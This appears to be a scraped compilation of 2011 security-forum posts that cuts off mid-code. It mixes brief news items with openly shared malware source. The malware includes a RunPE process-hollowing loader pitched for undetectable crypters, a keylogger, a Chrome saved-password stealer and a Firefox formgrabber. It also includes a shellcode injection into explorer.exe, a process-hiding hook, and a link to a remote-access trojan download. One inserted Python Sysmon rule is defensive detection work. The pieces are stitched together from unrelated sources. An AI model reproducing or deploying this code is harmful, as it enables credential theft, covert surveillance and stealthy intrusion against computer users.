Qubes – an Open Source operating system built to be secure
Andrei Avădănei, 13.06.2011

Qubes is an Open Source operating system with an architecture designed specifically to offer a secure desktop browsing experience. It is based on Xen, the X Window System and Linux, and can run almost any type of Linux application and use most Linux drivers. Its authors promise that in the future they will also add support for running Windows applications.

Qubes, currently in beta, takes a "security by isolation" approach. To achieve this, Qubes relies on virtualization as its basic principle, being able to isolate different programs from one another, or even different system components such as networking, the storage subsystem and so on. This is meant to prevent problems arising in one subsystem from affecting the integrity of the whole system.

Qubes ships with several profiles for virtual machines (known as AppVMs), such as "personal", "work", "shopping", "bank" or "random", and lets applications run as if they were executing on the local machine. It also supports securely copying and moving an application from one virtual machine to another.

More details about the operating system's architecture can be found here, and a few screenshots of it here.

Source: Qubes - sistem de operare Open Source construit pentru a fi sigur | WorldIT
Spanish police website hit by Anonymous hackers
13 June 2011, last updated at 10:50 GMT

The website of Spain's national police force has been briefly knocked offline by hacker collective Anonymous. The attack on the site was carried out in retaliation for the arrest of three Spanish men the police claimed were 'core' members of the group. The hackers managed to keep Página Oficial del Cuerpo Nacional de Policía offline for about an hour from 2130 GMT on 12 June.

Spanish authorities would not confirm that Anonymous was behind the attack, saying only that the site was offline. However, a statement was posted on a website linked to Anonymous claiming responsibility for the hack, which it called #OpPolicia. The group said it had used a distributed denial of service attack (DDoS), which bombards a target website with so much data that it becomes overwhelmed.

A spokesman for the Spanish police said the cause of the outage had not yet been established. "A website can collapse if too many people try to access it at once. I cannot confirm the link with the Anonymous group," said the spokesman.

In its statement, Anonymous said the DDoS attack was a "direct response to the Friday arrests of three individuals alleged to be associated with acts of cyber civil disobedience attributed to Anonymous." The group said DDoS attacks were a legitimate form of peaceful protest. Some of its members are thought to have carried out similar attacks on Turkish government websites to protest against net censorship.

Anonymous also denied that the men arrested were part of the "core" of Spanish members of the group. "They did not arrest any core group, because we don't have a core group," said Anonymous in its statement.

Source: BBC News - Spanish police website hit by Anonymous hackers
Blind Sql Injection – Regular Expressions Attack
Authors: // Removed on request

Index
- Why blind sql injection?
- How blind sql injection can be used?
- Testing vulnerability (MySQL - MSSQL)
- Time attack (MySQL)
- Time attack (MSSQL)
- Regexp attack's methodology
- Finding table name with Regexp attack (MySQL)
- Finding table name with Regexp attack (MSSQL)
- Exporting a value with Regexp attack (MySQL)
- Exporting a value with Regexp attack (MSSQL)
- Time considerations
- Bypassing filters
- Real life example
- Conclusions

Download: http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf
These are the course materials of a professor at the University of Bucharest, Faculty of Mathematics and Computer Science (I had classes with him too, though not cryptography): Adrian Atanasiu.

Cryptography course (semester 1): Lecture 1, Lecture 2, Lecture 3, Lecture 4, Lecture 5, Lecture 6, Lecture 7, Lecture 8, Lecture 9, Lecture 10, Lecture 11, Lecture 12, Lecture 13

Cryptography course (semester 2): Lecture 1, Lecture 2, Lecture 3, Lecture 4, Lecture 5, Lecture 6, Lecture 7, Lecture 8, Lecture 9

Source: http://www.galaxyng.com/adrian_atanasiu/cript.htm

PS: You can look up his books:
- Securitatea informatiei - Vol. I - Criptografie
- Securitatea informatiei - Vol. II - Protocoale de securitate
- Arhitectura sistemelor de calcul
All of them are from the InfoData publishing house, I think.
Yes, but it's not exactly genius to figure out that it's a SQLite database. You can open it with SQLite Explorer, or whatever other utility for this kind of database, and see the structure, then "SELECT * FROM logins" and there are the passwords. If you open that file "C:\Users\Ionut\AppData\Local\Google\Chrome\User Data\Default\Login Data" with Notepad, the first characters are "SQLite format 3", and further on you also find:

    CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, ssl_valid INTEGER NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, UNIQUE (origin_url, username_element, username_value, password_element, submit_element, signon_realm))

which tells you everything you need.
PS: The idea is this: the guy from Jurnalul, besides not being clueless about the field at all, has collaborated countless times with Hackersblog. So there is a link between RST and Jurnalul. As he himself said: if someone writes an article without asking you, the all-knowing ones, it's not good. If they do ask you, it's still not good. So you're losers.

On topic: It's probably a simple SQL Injection. What I mean is: these days there are a lot of people who "know" SQL Injection, and many of them, besides their airs of world-class hackers, want to get noticed. And yes, this type of attack, besides not being very difficult, can have pretty nice results: from access to the data in the database to root on the server being attacked. It's probably someone trying to get noticed. I don't think it's anything more complex; if some government organization were involved, other problems would probably have appeared too, political ones for example. And the attack would not have been simple: they would probably have scanned the IMF's entire network first, to gather as much information as possible, and possibly used people on the inside... I stick to the idea that some kid with a "hacker" attitude thought of looking for SQL Injection (or LFI, XSS...) in a big site, searched Google with some dork, and what did he find? The IMF...
[c++] Run Program From Memory And Not File
Author: Galco

    void RunFromMemory(char* pImage, char* pPath)
    {
        DWORD dwWritten = 0;
        DWORD dwHeader = 0;
        DWORD dwImageSize = 0;
        DWORD dwSectionCount = 0;
        DWORD dwSectionSize = 0;
        DWORD firstSection = 0;
        DWORD previousProtection = 0;
        DWORD jmpSize = 0;

        IMAGE_NT_HEADERS INH;
        IMAGE_DOS_HEADER IDH;
        IMAGE_SECTION_HEADER Sections[1000];
        PROCESS_INFORMATION peProcessInformation;
        STARTUPINFO peStartUpInformation;
        CONTEXT pContext;

        char* pMemory;
        char* pFile;

        memcpy(&IDH, pImage, sizeof(IDH));
        memcpy(&INH, (void*)((DWORD)pImage + IDH.e_lfanew), sizeof(INH));
        dwImageSize = INH.OptionalHeader.SizeOfImage;
        pMemory = (char*)malloc(dwImageSize);
        memset(pMemory, 0, dwImageSize);
        pFile = pMemory;

        dwHeader = INH.OptionalHeader.SizeOfHeaders;
        firstSection = (DWORD)(((DWORD)pImage + IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
        memcpy(Sections, (char*)(firstSection), sizeof(IMAGE_SECTION_HEADER) * INH.FileHeader.NumberOfSections);
        memcpy(pFile, pImage, dwHeader);

        if ((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment) == 0)
        {
            jmpSize = INH.OptionalHeader.SizeOfHeaders;
        }
        else
        {
            jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);

        for (dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
        {
            jmpSize = 0;
            dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
            memcpy(pFile, (char*)(pImage + Sections[dwSectionCount].PointerToRawData), dwSectionSize);
            if ((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment) == 0)
            {
                jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
            }
            else
            {
                jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
                jmpSize += 1;
                jmpSize *= INH.OptionalHeader.SectionAlignment;
            }
            pFile = (char*)((DWORD)pFile + jmpSize);
        }

        memset(&peStartUpInformation, 0, sizeof(STARTUPINFO));
        memset(&peProcessInformation, 0, sizeof(PROCESS_INFORMATION));
        memset(&pContext, 0, sizeof(CONTEXT));
        peStartUpInformation.cb = sizeof(peStartUpInformation);

        if (CreateProcess(NULL, pPath, &secAttrib, NULL, false, CREATE_SUSPENDED, NULL, NULL, &peStartUpInformation, &peProcessInformation))
        {
            hideProcess(peProcessInformation.dwProcessId);
            startHook(peProcessInformation.hProcess);
            pContext.ContextFlags = CONTEXT_FULL;
            GetThreadContext(peProcessInformation.hThread, &pContext);
            VirtualProtectEx(peProcessInformation.hProcess, (void*)((DWORD)INH.OptionalHeader.ImageBase), dwImageSize, PAGE_EXECUTE_READWRITE, &previousProtection);
            WriteProcessMemory(peProcessInformation.hProcess, (void*)((DWORD)INH.OptionalHeader.ImageBase), pMemory, dwImageSize, &dwWritten);
            WriteProcessMemory(peProcessInformation.hProcess, (void*)((DWORD)pContext.Ebx + 8), &INH.OptionalHeader.ImageBase, 4, &dwWritten);
            pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
            SetThreadContext(peProcessInformation.hThread, &pContext);
            VirtualProtectEx(peProcessInformation.hProcess, (void*)((DWORD)INH.OptionalHeader.ImageBase), dwImageSize, previousProtection, 0);
            ResumeThread(peProcessInformation.hThread);
        }
        free(pMemory);
    }

This function will run a process based on its memory instead of running a process from a file. Meaning, you can use this in crypters to have FUD runtime.

You can basically load an exe as a resource into your code and run it as a process like this:

    int main(int argc, char* argv[])
    {
        HGLOBAL hResData;
        HRSRC hResInfo;
        void* pvRes;
        DWORD dwSize;
        char* lpMemory;
        HMODULE hModule = GetModuleHandle(NULL);

        if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL)
            && ((hResData = LoadResource(hModule, hResInfo)) != NULL)
            && ((pvRes = LockResource(hResData)) != NULL))
        {
            dwSize = SizeofResource(hModule, hResInfo);
            lpMemory = (char*)malloc(dwSize);
            memset(lpMemory, 0, dwSize);
            memcpy(lpMemory, pvRes, dwSize);
            RunFromMemory(lpMemory, argv[0]);
        }
    }

The program running the process must have the same image base or else it will not work.

By the way, ignore these two lines:

    hideProcess(peProcessInformation.dwProcessId);
    startHook(peProcessInformation.hProcess);

I forgot to edit them out when I posted the function. Lol. Don't ask what they were used for.

Source: [c++] Run Program From Memory And Not File - rohitab.com - Forums
[C] GetRawInputData() keylogger
Author: defsanguje

Just another way to implement a user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. The GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc.) at a low level. More info can be found here.

    #define _WIN32_WINNT 0x0501
    #include <windows.h>

    // Definitions
    int LogKey(HANDLE hLog, UINT vKey);
    LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow);

    // Globals
    const char g_szClassName[] = "klgClass";

    // Window procedure of our message-only window
    LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
    {
        static HANDLE hLog;
        UINT dwSize;
        RAWINPUTDEVICE rid;
        RAWINPUT *buffer;

        switch(msg)
        {
            case WM_CREATE:
                // Register a raw input device to capture keyboard input
                rid.usUsagePage = 0x01;
                rid.usUsage = 0x06;
                rid.dwFlags = RIDEV_INPUTSINK;
                rid.hwndTarget = hwnd;

                if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
                {
                    MessageBox(NULL, "Registering raw input device failed!", "Error!", MB_ICONEXCLAMATION|MB_OK);
                    return -1;
                }

                // open log.txt
                hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
                if(hLog == INVALID_HANDLE_VALUE)
                {
                    MessageBox(NULL, "Creating log.txt failed!", "Error", MB_ICONEXCLAMATION|MB_OK);
                    return -1;
                }
                // append
                SetFilePointer(hLog, 0, NULL, FILE_END);
                break;

            case WM_INPUT:
                // request size of the raw input buffer to dwSize
                GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));
                // allocate buffer for input data
                buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);
                if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER)))
                {
                    // if this is keyboard message and WM_KEYDOWN, log the key
                    if(buffer->header.dwType == RIM_TYPEKEYBOARD && buffer->data.keyboard.Message == WM_KEYDOWN)
                    {
                        if(LogKey(hLog, buffer->data.keyboard.VKey) == -1)
                            DestroyWindow(hwnd);
                    }
                }
                // free the buffer
                HeapFree(GetProcessHeap(), 0, buffer);
                break;

            case WM_DESTROY:
                if(hLog != INVALID_HANDLE_VALUE)
                    CloseHandle(hLog);
                PostQuitMessage(0);
                break;

            default:
                return DefWindowProc(hwnd, msg, wParam, lParam);
        }
        return 0;
    }

    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
        WNDCLASSEX wc;
        HWND hwnd;
        MSG msg;

        // register window class
        ZeroMemory(&wc, sizeof(WNDCLASSEX));
        wc.cbSize = sizeof(WNDCLASSEX);
        wc.lpfnWndProc = WndProc;
        wc.hInstance = hInstance;
        wc.lpszClassName = g_szClassName;

        if(!RegisterClassEx(&wc))
        {
            MessageBox(NULL, "Window Registration Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK);
            return 0;
        }

        // create message-only window
        hwnd = CreateWindowEx(0, g_szClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL);
        if(!hwnd)
        {
            MessageBox(NULL, "Window Creation Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK);
            return 0;
        }

        // the message loop
        while(GetMessage(&msg, NULL, 0, 0) > 0)
        {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
        return msg.wParam;
    }

    int LogKey(HANDLE hLog, UINT vKey)
    {
        DWORD dwWritten;
        BYTE lpKeyboard[256];
        char szKey[32];
        WORD wKey;
        char buf[32];
        int len;

        // Convert virtual-key to ascii
        GetKeyState(VK_CAPITAL);
        GetKeyState(VK_SCROLL);
        GetKeyState(VK_NUMLOCK);
        GetKeyboardState(lpKeyboard);

        len = 0;
        switch(vKey)
        {
            case VK_BACK:
                len = wsprintf(buf, "[BP]");
                break;
            case VK_RETURN:
                len = 2;
                strcpy(buf, "\r\n");
                break;
            case VK_SHIFT:
                break;
            default:
                if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1)
                    len = wsprintf(buf, "%c", (char)wKey);
                else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0)
                    len = wsprintf(buf, "[%s]", szKey);
                break;
        }

        // Write buf into the log
        if(len > 0)
        {
            if(!WriteFile(hLog, buf, len, &dwWritten, NULL))
                return -1;
        }
        return 0;
    }

Source: [C]GetRawInputData() keylogger
[C] Google Chrome Password Recovery
Author: Sacrificial

    /*
     * Google Chrome Password Recovery
     *
     * Coded by Sacrificial
     * Sacrificial2010@hotmail.com
     *
     */
    void GetGoogleChrome()
    {
        char szPath[MAX_PATH];
        sqlite3 *lpDatabase;
        sqlite3_stmt *lpStatement;
        const char *lpTail;
        char *szURL, *szUsername, *szPassword;
        DATA_BLOB DataIn, DataOut;

        SHGetSpecialFolderPath(0, szPath, 0x1C, 0);
        strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data");

        if(GetFileAttributes(szPath) != 0xFFFFFFFF)
        {
            sqlite3_open(szPath, &lpDatabase);
            sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail);
            do
            {
                DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5);
                DataIn.cbData = sqlite3_column_bytes(lpStatement, 5);
                if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut))
                {
                    szURL = (char*)sqlite3_column_text(lpStatement, 0);
                    szUsername = (char*)sqlite3_column_text(lpStatement, 3);
                    szPassword = (char*)DataOut.pbData;
                    szPassword[DataOut.cbData] = '\0';
                    // Do whatever you want with em;
                }
            } while(sqlite3_step(lpStatement) == SQLITE_ROW);
        }
    }

Note: It's not the best coding, but it works, and like I said it's old. It requires the SQLite libraries.

For Chrome 6 and up the path is "\\Google\\Chrome\\User Data\\Default\\Login Data"
For Chrome 5 and below the path is "\\Google\\Chrome\\User Data\\Default\\Web Data"

Would be nice if you gave credits when using this code. Enjoy

Source: [sNIPPET] Google Chrome Password Recovery
[C] FireFox Formgrabber
Author: datemme

Here's an example of a Firefox formgrabber:

dllmain:

    #include "hookdll.cpp"

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            Funktion();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }

HookDll.cpp:

    // hookdll.cpp : Defines the exported functions for the DLL application.
    #include <iostream>
    #include <fstream>
    using namespace std;
    #pragma once
    #include <windows.h>
    #include <prio.h>
    #pragma comment (lib, "nspr4.lib")

    BYTE hook[6];

    DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup)
    {
        DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName);
        BYTE jmp[6] = { 0xe9,                    // jmp
                        0x00, 0x00, 0x00, 0x00,  // address
                        0xc3 };                  // retn
        ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0);
        DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5);  // ((to)-(from)-5)
        memcpy(&jmp[1], &dwCalc, 4);                       // build the jmp
        WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0);
        return dwAddr;
    }

    BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup)
    {
        DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName);
        if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0))
            return TRUE;
        return FALSE;
    }

    int WriteLog(const char * Filename, char * Text)
    {
        ofstream File;                  // Names File as ofstream (for output to file)
        File.open(Filename, ios::app);  // Opens the file to append; if you used ios::out again, it would erase everything and rewrite the file
        File << Text;                   // Outputs to file
        File.close();                   // Closes opened file
        SetFileAttributes(Filename, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL);
        return 1;
    }

    PRInt32 cPR_Write(PRFileDesc *fd, const void *buf, PRInt32 amount)
    {
        UnHookFunction("nspr4.dll", "PR_Write", hook);
        PRInt32 hResult = PR_Write(fd, buf, amount);
        if (strncmp((LPCSTR)buf, "POST", lstrlen("POST")) == 0) { WriteLog("test.txt", (char*)buf); };
        if (strncmp((LPCSTR)buf, "GET", lstrlen("GET")) == 0) { WriteLog("test.txt", (char*)buf); };
        HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook);
        return hResult;
    }

    extern "C" void __declspec(dllexport) Funktion()
    {
        HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook);
    }

    // You need to download the Gecko SDK (google it) and set the additional Include path and Lib path in the project details
    // vc++ 2008, compiled in multibyte mode
    // inject it in FF and have fun !!!
    // can be very useful if you "forgot" your password on a website
    // advantage compared to Pw-Grabbers and Keyloggers: logs both manually entered passwords and saved passwords
    // you can of course filter for special tags with a slight modification

datemme

Source: FireFox Formgrabber
[C] Self Delete - explorer.exe injection
Author: __v00d00

    // __v00d00 __ OpenSC.ws __
    // A process cannot simply delete itself
    // At some point, code will have to run in the context of another process
    // People typically run a batch file in the background - but this can be noticeable
    // I inject an assembly stub into explorer.exe - it loops on DeleteFile
    // Once the file is deleted the thread exits.
    // I also have the thread sleep so that explorer.exe doesn't start eating up too many resources.
    // Then the thread kills itself.
    void selfDestruct()
    {
        BYTE stub[] = {
            // "\xcc"                    // debug int 3
            "\x68" "\xDE\xAD\xBE\xAF"    // push argument (pointer to path)
            "\xB8" "\xDE\xAD\xBA\xBE"    // mov eax DeleteFile
            "\xFF\xD0"                   // call eax
            "\x50"                       // push eax
            "\x68" "\x00\x01\x00\x00"    // push 100
            "\xB8" "\xDE\xAD\xBE\xAF"    // mov eax Sleep
            "\xFF\xD0"                   // call eax
            "\x58"                       // pop eax
            "\x85\xc0"                   // test eax, eax
            "\x74\xe2"                   // jnz to start
            "\x6A" "\x00"                // push 0
            "\xB8" "\xDE\xAD\xBE\xAF"    // mov eax RtlExitUserThread
            "\xFF\xD0"                   // call eax
        };

        HANDLE hProc, hThread;
        DWORD pid;
        LPVOID pRemotePathStr, pRemoteStub;
        char ourPath[MAX_PATH];
        HMODULE hKernel;
        HMODULE hNtdll;
        DWORD dwDeleteFile;
        DWORD dwSleep;
        DWORD dwExitThread;

        GetModuleFileName(NULL, ourPath, MAX_PATH);
        pid = GetPidByName("explorer.exe");
        if(!pid) return;
        hKernel = GetModuleHandle("kernel32.dll");
        if(!hKernel) return;
        hNtdll = GetModuleHandle("ntdll.dll");
        if(!hNtdll) return;
        dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
        dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
        dwExitThread = (DWORD)GetProcAddress(hNtdll, "RtlExitUserThread");

        hProc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, false, pid);
        if (hProc == NULL) return;

        pRemotePathStr = VirtualAllocEx(hProc, NULL, strlen(ourPath) + 1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (pRemotePathStr == NULL) return;
        if (!WriteProcessMemory(hProc, pRemotePathStr, ourPath, strlen(ourPath) + 1, NULL)) return;

        pRemoteStub = VirtualAllocEx(hProc, NULL, sizeof(stub), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (pRemoteStub == NULL) return;

        memcpy(stub + 1, &pRemotePathStr, 4);
        memcpy(stub + 6, &dwDeleteFile, 4);
        memcpy(stub + 19, &dwSleep, 4);
        memcpy(stub + 33, &dwExitThread, 4);

        if (!WriteProcessMemory(hProc, pRemoteStub, stub, sizeof(stub), NULL)) return;

        hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteStub, NULL, 0, 0);
        if (!hThread) return;

        DelStartUp(); // remove our startup key
        exit(1);
    }

Source: Self Delete
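Detection angle for the injection above, as an added example that is not part of the original post: a small Python rule over constructed Sysmon Event ID 8 (CreateRemoteThread) records that flags remote threads into explorer.exe whose start address is not backed by any loaded module, which is what a stub written into a VirtualAllocEx'd region looks like in telemetry. The "Field: value" layout mimics an Event Viewer text export and every path and address in the sample is invented.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed Sysmon Event ID 8 (CreateRemoteThread) records, laid out like an
# Event Viewer text export ("Field: value" lines, one blank line between events).
# Paths and addresses are invented; fields not needed here (UtcTime, GUIDs, ...)
# are omitted.
SAMPLE_EVENTS = """\
EventID: 8
SourceImage: C:\\Users\\victim\\AppData\\Local\\Temp\\dropper.exe
TargetImage: C:\\Windows\\explorer.exe
StartAddress: 0x02A40000
StartModule:
StartFunction:

EventID: 8
SourceImage: C:\\Windows\\System32\\svchost.exe
TargetImage: C:\\Windows\\explorer.exe
StartAddress: 0x77A1F9C0
StartModule: C:\\Windows\\System32\\ntdll.dll
StartFunction: RtlUserThreadStart

EventID: 8
SourceImage: C:\\Tools\\injector.exe
TargetImage: C:\\Windows\\explorer.exe
StartAddress: 0x7C801D7B
StartModule: C:\\Windows\\System32\\kernel32.dll
StartFunction: LoadLibraryA

EventID: 8
SourceImage: C:\\Tools\\injector.exe
TargetImage: C:\\Windows\\notepad.exe
StartAddress: 0x00350000
StartModule:
StartFunction:
"""


@dataclass
class RemoteThreadEvent:
    source: str
    target: str
    start_address: int
    start_module: str
    start_function: str


def parse_events(text: str) -> List[RemoteThreadEvent]:
    """Parse 'Field: value' blocks; only EventID 8 records are kept."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")  # split at the first colon only, so "C:\..." survives
            fields[key.strip()] = value.strip()
        if fields.get("EventID") != "8":
            continue
        events.append(RemoteThreadEvent(
            source=fields.get("SourceImage", ""),
            target=fields.get("TargetImage", ""),
            start_address=int(fields.get("StartAddress", "0"), 16),
            start_module=fields.get("StartModule", ""),
            start_function=fields.get("StartFunction", ""),
        ))
    return events


def classify(ev: RemoteThreadEvent) -> str:
    """Severity for one remote-thread event: 'high', 'medium' or 'low'."""
    if not ev.start_module:
        # Start address backed by no loaded module: a stub written with
        # WriteProcessMemory into a VirtualAllocEx'd region, as in the post above.
        return "high"
    if ev.start_function.lower().startswith("loadlibrary"):
        # Entry point is kernel32!LoadLibraryA/W: the classic DLL-injection pattern.
        return "medium"
    return "low"


def find_injections(text: str, target_name: str = "explorer.exe") -> List[dict]:
    """Alerts for remote threads created in `target_name`; 'low' events are dropped."""
    alerts = []
    for ev in parse_events(text):
        if not ev.target.lower().endswith("\\" + target_name.lower()):
            continue
        severity = classify(ev)
        if severity != "low":
            alerts.append({"severity": severity, "source": ev.source,
                           "start_address": ev.start_address, "start_function": ev.start_function})
    return alerts


if __name__ == "__main__":
    for alert in find_injections(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['source']} -> explorer.exe "
              f"start=0x{alert['start_address']:08X} {alert['start_function'] or '(unbacked memory)'}")
```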
Xtreme RAT v2.8

RAT - Remote Administration Tool

This is a tool that allows you to control your computer from anywhere in the world. With full support for Unicode languages, you will never have problems using this software. Here you can find new updates, information and tutorials about this software.

Here are some images of v2.8:

Version 2.8 (04/06/2011)

Here are some changes since the last version. Please update your servers.
- Close the options window after selecting your language and other settings.
- Sometimes, when using the File manager to upload files, the folder name appeared with '\\'. This is now corrected.
- Corrected a bug in the file manager when the user selects a file with "0 bytes".
- Some options in the MSN functions were removed until an update to use the new Windows Live Messenger.
- Added better error handling when servers are disconnected.
- Changed injection method.
- Corrected a bug when trying to close the options window (UPnP).
- Changed GUI.
- Corrected high CPU usage that occurred sometimes.
- Corrected some bugs in the remote shell function.
- Added a new column to the main list: Account Type.

Download: http://sites.google.com/site/nxtremerat/XtremeRATv2.8.3.zip?attredirects=0
Password: 123

Source: Xtreme RAT v2.8
A few current Ebooks:
- NMAP_cookbook.pdf
- iPhone Programming - The Big Nerd Ranch Guide.pdf
- hello-android_3e.pdf
- Practical Packet Analysis_ Using Wireshark to Solve Real-World Network Problems.pdf
- The IDA PRO Book.pdf
- Disassembling Code - IDA Pro And SoftICE.chm
- Identifying Malicious Code Through Reverse Engineering.pdf
- Reversing Secrets of Reverse Engineering.pdf

Download: http://hotfile.com/dl/116717781/27ecc69/Ebooks.zip.html

Source: A few current ebooks
Spam, you don't need to bring the whole exploit-db here, only what's important...
Cyberghost Vpn + KeYgEn cracked premium Version 2011
It's actually Radmin, permanent ban.
How to make an application portable using WinRAR
Yes, but it doesn't work for all programs. Some copy files into system32, others into AppData or who knows what other folders. You have to know where all of them are. Also, if for example ActiveX controls are involved, they have to be "installed" too: regsvr32 has to be run... Likewise, most programs save data in the Registry at install time, a lot of data, which is missing in this case, and many problems can appear. But as an idea it's good; it probably works for enough programs.
Writing a File Infector/Encrypter

It works with any PE32 executable file, overcomes issues with randomized base addresses, and takes advantage of Visual Studio's C++ compiler to generate the assembly code to inject into the target. This allows for large portions of the injected code to be written in C and greatly speeds up development time. Lastly, the target file is also encrypted by the infector and the decryption routine is written in to decrypt the file image at runtime.

PDF:
- Writing a File Infector/Encrypter: Background (1/4) http://blog.codereversing.com/infect1.pdf
- Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4) http://blog.codereversing.com/infect2.pdf
- Writing a File Infector/Encrypter: Writing the Compiled Stub (3/4) http://blog.codereversing.com/infect3.pdf
- Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4) http://blog.codereversing.com/infect4.pdf

Source: http://www.hackhound.org/forum/index.php?/tutorials/article/623-writing-a-file-infectorencrypter/
[c] Process Hiding
Author: stdio

I didn't really see a good C example, so I decided to share my DLL that hooks NtQuerySystemInformation and hides explorer.exe.

    #include <Windows.h>
    #include "sysinfo.h"

    BYTE OrigBytes[5];
    WCHAR g_TargetProc[] = L"explorer.exe";

    __declspec(naked) NTSTATUS NTAPI OriginalNtQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL)
    {
        __asm
        {
            mov eax, 0dfh        // 5 bytes, overwritten with the original 5 bytes read from ntdll
            mov ecx, 0xcafebabe  // patched at hook time with the address of the original function + 5
            jmp ecx
        }
    }

    NTSTATUS NTAPI HookedNtQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL)
    {
        NTSTATUS Result;
        PSYSTEM_PROCESSES pSystemProcess;
        PSYSTEM_PROCESSES pNextSystemProcess;

        Result = OriginalNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

        switch(SystemInformationClass)
        {
        case SystemProcessInformation:
            pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
            pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
            while(pNextSystemProcess->NextEntryDelta != 0)
            {
                if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer, g_TargetProc) == 0)
                {
                    pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
                }
                pSystemProcess = pNextSystemProcess;
                pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
            }
            break;
        }
        return Result;
    }

    DWORD PlaceHook()
    {
        DWORD oldProtect;
